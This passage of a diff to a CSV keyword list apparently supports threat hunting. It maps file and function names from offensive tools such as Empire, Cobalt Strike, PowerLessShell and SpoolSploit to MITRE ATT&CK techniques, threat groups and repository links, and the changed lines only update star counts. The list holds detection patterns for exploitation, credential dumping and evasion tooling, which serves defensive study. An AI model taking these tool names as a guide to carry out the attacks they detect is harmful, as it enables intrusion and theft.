Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_kernel_user_payload*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_anonymous_login_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_echo_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_free_hole_session_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_nt_trans_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_trans2_explo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_body_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb2_payload_headers_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*makebof.bat*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*MakeHTTPSmugglerJAR.launch*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation 
tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" -"*malicious.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" +"*malicious.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*malicious.dll*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*MaliciousMacroGenerator*","offensive_tool_keyword","MaliciousMacroGenerator","Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.","T1027 - T1564 - T1127 - T1059 - T1562","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator","1","0","N/A","N/A","9","808","210","2019-04-17T19:47:38Z","2016-09-21T23:18:14Z" 
"*MaliciousMacroMSBuild-master*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*Malleable C2 Files*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" "*Malleable PE/Stage*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*malleable_redirector.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*malleable_redirector_hidden_api_endpoint*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable_redirector.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*malleable_redirector_hidden_api_endpoint*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Malleable-C2-Profiles*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*Malleable-C2-Randomizer*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary 
